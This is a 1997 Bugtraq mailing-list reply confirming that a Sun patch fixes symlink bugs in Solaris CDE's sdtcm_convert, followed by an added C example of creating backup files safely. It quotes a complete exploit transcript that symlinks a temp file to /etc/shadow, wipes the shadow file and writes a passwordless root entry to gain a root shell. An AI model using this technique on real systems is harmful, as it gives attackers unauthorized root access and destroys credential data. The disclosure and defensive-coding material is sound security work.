[4088] in bugtraq


Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit

daemon@ATHENA.MIT.EDU (Brian Parent)
Mon Feb 24 20:39:11 1997

Date: 	Mon, 24 Feb 1997 15:28:52 -0800
Reply-To: Brian Parent <bparent@CALVIN.UCSD.EDU>
From: Brian Parent <bparent@CALVIN.UCSD.EDU>
X-To:         shuque@SAS.UPENN.EDU
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199702232040.PAA27325@orion.sas.upenn.edu> from Shumon Huque at
              "Feb 23, 97 03:40:43 pm"

I was able to confirm that both bugs were present in CDE 1.0.2,
and that both were patched successfully with 103670-02.
I'm running 2.5.1.

The two bugs I'm referring to are the one outlined by

        Cristian Schipor - Computer Science Faculty - Bucharest - Romania

(using /usr/spool/calendar/callog.USER -> /etc/shadow)

as well as the one outlined by Adam Morrison (using /tmp/calorig.USER ->
/etc/shadow).

Re:
> Date:         Sun, 23 Feb 1997 15:40:43 -0500
> From: Shumon Huque <shuque@SAS.UPENN.EDU>
> Subject:      Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
> To: BUGTRAQ@NETSPACE.ORG
> In-Reply-To:  <199702231045.MAA00882@lune.math.tau.ac.il> from "Adam Morrison"
>               at Feb 23, 97 12:45:40 pm
>
> I don't know what exactly 103670-02 fixed but this exploit didn't work
> on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink
> /tmp/calorig.user was removed and replaced by a plain file owned
> by user.
>
> >
> > > Is this the bug fixed in the Sun patches:
> > > 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> > > 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> > > 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> > > 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> > > or is it a new one?
> >
> > That's hard to know, since this patch is not publicly available off
> > SunSolve (not right now, anyway).
> >
> > There's at least one other hole in sdtcm_convert which this patch may or not
> > fix.
> >
> > CDE is generally a can of worms.
> >
> >
> > $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
> >
> > Script started on Thu Jul 11 22:15:03 1996
> > 22:15  [wumpus:~] % whoami
> > adam
> > 22:15  [wumpus:~] % ls -l /etc/shadow
> > -r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
> > 22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
> > 22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
> > Loading the calendar ...
> >
> > WARNING!! Data will be lost when converting version 4 data format
> > back to version 3 data format.
> >
> > Do you want to continue? (Y/N) [Y] y
> >
> > Doing conversion ...
> > Writing out new file ...
> > Conversion done successfully.
> > Total number of appointments                    = 0
> > Number of one-time appointments converted       = 0
> > Number of repeating appointments converted      = 0
> > Number of one-time appointments pruned          = 0
> > Number of repeating appointments pruned         = 0
> > The original file is saved in /tmp/calorig.adam
> > 22:15  [wumpus:~] % ls -l /etc/shadow
> > -r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
> > 22:15  [wumpus:~] % chmod 644 /etc/shadow
> > 22:15  [wumpus:~] % cp /dev/null /etc/shadow
> > cp: overwrite /etc/shadow (y/n)? y
> > 22:15  [wumpus:~] % ls -l /etc/shadow
> > -rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
> > 22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
> > 22:16  [wumpus:~] % su
> > # id
> > uid=0(root) gid=1(other)
> > # exit
> >
> > script done on Thu Jul 11 22:16:21 1996
> >
> >
> >
> >                                                 adam?
> >
>

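The transcript quoted above shows a privileged converter writing its backup file to a fixed name in a world-writable directory and following whatever symlink has been planted at that name. The following C code is an added example, not part of the thread and not Sun's code: it shows how a program should create such a backup so that a pre-planted symlink is refused (open with O_CREAT|O_EXCL|O_NOFOLLOW, then re-verify the descriptor with fstat). The directory and file names in the demonstration are constructed, and the zero-length "target" file stands in for a sensitive file. It assumes a POSIX system that provides O_NOFOLLOW and mkdtemp.

```c
/* Added example (not from the thread): creating a backup file such as
 * "calorig.USER" in a world-writable directory without following a
 * pre-planted symlink. Assumes POSIX with O_NOFOLLOW and mkdtemp. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns an open, owner-only descriptor for a newly created regular file,
 * or -1 if anything (file, symlink, ...) already exists at path or the
 * created object is not a plain single-link regular file. */
int safe_create_backup(const char *path)
{
    /* O_EXCL: fail if the name already exists, whatever it points to.
     * O_NOFOLLOW: never follow a symlink in the final component.
     * 0600: the backup is readable by its owner only. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;

    /* Check through the descriptor, not the path, so the check cannot be
     * raced by renaming things underneath us. */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink planted at the backup name (pointing at a
 * harmless dummy file here) must be refused, a fresh name must succeed, and
 * the dummy target must remain untouched. Returns 1 when all three hold. */
int demo_symlink_is_refused(void)
{
    char dir[] = "/tmp/calbackup-demo-XXXXXX";   /* constructed scratch dir */
    if (mkdtemp(dir) == NULL)
        return 0;

    char target[512], planted[512], fresh[512];
    snprintf(target, sizeof target, "%s/target", dir);        /* stand-in for a sensitive file */
    snprintf(planted, sizeof planted, "%s/calorig.demo", dir); /* name an attacker would pre-plant */
    snprintf(fresh, sizeof fresh, "%s/calorig.fresh", dir);    /* name with nothing planted */

    int ok = 0;
    int tfd = open(target, O_WRONLY | O_CREAT, 0600);
    if (tfd >= 0 && close(tfd) == 0 && symlink(target, planted) == 0) {
        int refused = (safe_create_backup(planted) == -1);
        int fd = safe_create_backup(fresh);
        int created = (fd >= 0);
        if (fd >= 0)
            close(fd);
        struct stat st;
        int untouched = (stat(target, &st) == 0 && st.st_size == 0);
        ok = refused && created && untouched;
    }

    unlink(planted);
    unlink(fresh);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("%s\n", demo_symlink_is_refused()
                       ? "planted symlink refused, fresh backup created"
                       : "unexpected result");
    return 0;
}
```

The key point is that neither O_EXCL nor O_NOFOLLOW alone is the whole fix: O_EXCL makes the open fail if any name already exists at the path, O_NOFOLLOW guards against the symlink case even where O_EXCL is not used, and the fstat on the descriptor confirms what was actually opened. A patched converter that "removes the symlink and replaces it with a plain file", as the quoted report describes, still leaves a window unless the creation itself is done this way.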